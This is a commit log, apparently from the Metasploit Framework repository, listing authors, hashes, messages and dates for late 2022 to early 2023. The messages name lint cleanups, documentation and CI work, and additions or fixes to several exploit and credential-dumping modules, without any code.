cgranleese-r7	fb196cb378	Testing Ruby 3.2 against CI	2023-01-31 13:19:06 +00:00
bcoles	11cf391da8	modules/exploits/linux/ssh: Resolve Rubocop violations	2023-01-31 23:59:22 +11:00
adfoster-r7	7bb0eca931	Land #17545 , use strings in YAML files	2023-01-30 22:52:19 +00:00
Metasploit	42004c07bc	automatic module_metadata_base.json update	2023-01-30 16:43:35 -06:00
adfoster-r7	433099e539	Land #17563 , modules/exploits/multi/local: Resolve Rubocop and msftidy_docs violations	2023-01-30 22:16:41 +00:00
Grant Willcox	bfc5c563a1	Land #17570 , Add new queries and attributes for ldap_query	2023-01-30 16:14:26 -06:00
Spencer McIntyre	902eaa2562	Add new queries and attributes for ldap_query	2023-01-30 16:24:23 -05:00
dwelch-r7	e3a9e5a163	Land #17565 , Add Metasploit prompt color highlighting to docs	2023-01-30 13:05:08 +00:00
adfoster-r7	f3a372719c	Land #17568 , Plugins: Resolve Rubocop violations	2023-01-30 11:35:31 +00:00
bcoles	db90604333	plugins/bescure: Replace 'initheaders' Hash key with Hash in Net::HTTP::Post.new calls	2023-01-30 22:11:21 +11:00
bcoles	4ff475f180	plugins: Resolve rubocop violations	2023-01-30 13:07:16 +11:00
bcoles	7cf37f5fb7	plugins: rubocop -A plugins	2023-01-30 13:05:34 +11:00
bcoles	dd20bcac77	plugins: rubocop -a plugins	2023-01-30 12:25:46 +11:00
adfoster-r7	c68ab9b77f	Add Metasploit prompt color highlighting to docs	2023-01-28 22:43:33 +00:00
Duarte Silva	a7ae3c9389	Fixed AnyConnect IPC message format: - Made an error in the original research where the TLV had a type and a index, when it only has a type and a modifier that makes it into a TV (Type and Value, no Length). - A TV has its value where the Length would be on a TLV. - Also added a note on the endieness being correct/working because endieness has no impact in the message being used to exploit the vulnerability.	2023-01-28 09:08:51 +00:00
bcoles	e11aaa8027	modules/exploits/multi/local: Resolve Rubocop and msftidy_docs violations	2023-01-28 15:02:24 +11:00
Metasploit	1b20db8900	automatic module_metadata_base.json update	2023-01-27 14:39:53 -06:00
Grant Willcox	be85aa253d	Fix input and output buffers for some mislabeled functions	2023-01-27 14:09:45 -06:00
Jack Heysel	c3e73b9b11	Land #17557 , Fix the logon_time in the MS14-068	2023-01-27 15:08:49 -05:00
Grant Willcox	1782ae1ff2	Fix up links within Wiki site to make them relative links where possible	2023-01-27 10:09:02 -06:00
Grant Willcox	6043d0ffba	Update all links from Wiki site to new docs site.	2023-01-27 09:58:53 -06:00
Grant Willcox	6111852df8	Land #17504 , add 'favorite -l' and 'favorites' as aliases for show favorites	2023-01-27 09:37:06 -06:00
adfoster-r7	c681358f88	Land #17558 , Fixes analyze command crashing with a winrm session opened	2023-01-27 15:35:40 +00:00
Spencer McIntyre	647cf1d402	Return Time from #extract_logon_time	2023-01-27 10:05:02 -05:00
Metasploit	8d4d48e005	automatic module_metadata_base.json update	2023-01-27 08:14:45 -06:00
dwelch-r7	4c54fffaed	Land #17560 , Present unsupported ul_types in a clearer way to the user	2023-01-27 13:50:55 +00:00
adfoster-r7	020e221c42	Present unsupported ul_types in a clearer way to the user	2023-01-27 13:40:33 +00:00
cgranleese-r7	1d8c9d3690	Fixes analyze command crashing with a winrm session opened	2023-01-27 10:45:05 +00:00
Spencer McIntyre	f4976a0f9f	Fix the logon_time in the MS14-068 exploit	2023-01-26 16:16:55 -05:00
Metasploit	d80a18a00c	Bump version of framework to 6.3.1	2023-01-26 13:40:05 -06:00
Grant Willcox	87b9152314	Continue fixing versions of Ruby in YAML files not being properly quoted like they should be.	2023-01-26 09:49:08 -06:00
Spencer McIntyre	f81195d0cc	Fix a typo	2023-01-25 13:45:18 -05:00
Spencer McIntyre	6fe0933c1e	Add exploit for CVE-2022-44877	2023-01-20 09:04:24 -05:00
ErikWynter	6419f2d5a5	add 'favorite -l' and 'favorites' as aliases for show favorites	2023-01-19 14:21:45 +02:00
h00die	3a0b694790	better engrish	2023-01-18 20:12:49 -05:00
h00die	c823295915	cleanup better	2023-01-18 16:19:48 -05:00
npm-cesium137-io	8ed4f59c60	veeam_credential_dump refinement Fixed stupid typo in markdown. Fixed a bug in the export code that prevented the disposition column from being exported.	2023-01-18 14:27:28 -05:00
h00die	d0abb5697b	re-add license stuff	2023-01-17 17:31:01 -05:00
bwatters	0dbb0dc8c9	Fix margins for readability and delete file	2023-01-17 17:28:27 -05:00
bwatters	d1f878c4f0	Fix spelling	2023-01-17 17:28:27 -05:00
bwatters	158c557d58	Update LICENSE file and location of source file	2023-01-17 17:28:22 -05:00
h00die	e28ff3b160	minor fixes	2023-01-17 15:30:36 -05:00
h00die	be7ca91a8f	cve-2022-22942	2023-01-17 15:30:36 -05:00
Hamilton Tobon Mosquera	d01060f40f	docs: how to set complex options using quotes	2023-01-16 17:38:20 -05:00
Hamilton Tobon Mosquera	fd7fbb76af	fix: cmd_run: remove unnecessary map Removing the call to .map over args[:datastore_options] avoids an unnecessary call to Msf::DataStore#import_options_from_s. args[:datastore_options] is already a hash, converting it to string and using Msf::DataStore#import_options_from_s converts it back to hash, which is not necessary. The Msf::Simple::Module mixin already offers support for Options, which is expected to be a hash. This change also prevents sending corner case option strings to Msf::DataStore#import_options_from_s when using post modules, which does not support strings like: "COMMAND='date --date=2023-01-01'".	2023-01-11 16:54:13 -05:00
Hamilton Tobon Mosquera	03acb7e9f2	test: added rspec tests for `6074d1a4d3`	2023-01-11 15:46:55 -05:00
npm-cesium137-io	499d1ccfd7	Refactor veeam_credential_dump Changed the SQL queries for DB dump to explicit VARCHAR(4096) to get around sqlcmd's 256-char column limit. Refactored the BATCH_DPAPI functionality because I can't seem to let this pattern go: now actually batches with byte threshold set by advanced option. Reduced clutter and redundancy. Various tweaks and bug fixes. Updated documentation.	2023-01-09 16:31:44 -05:00
Hamilton Tobon Mosquera	6074d1a4d3	fix: parse COMMAND with nested '=' in meterpreter Fixes bug #16578	2023-01-06 09:27:25 -05:00
timwr	ce260f53f3	Add CVE-2022-46689 macOS dirty cow	2022-12-28 22:46:08 +07:00
npm-cesium137-io	9cc8d41388	veeam_credential_dump post module revisions Cleanup for initial PR.	2022-12-21 15:53:46 -05:00
npm-cesium137-io	6eaa0bfab2	Add veeam_credential_dump post module Post module for Veeam Backup and Replication / Veeam ONE Monitor Server credential extract	2022-12-10 16:21:59 -05:00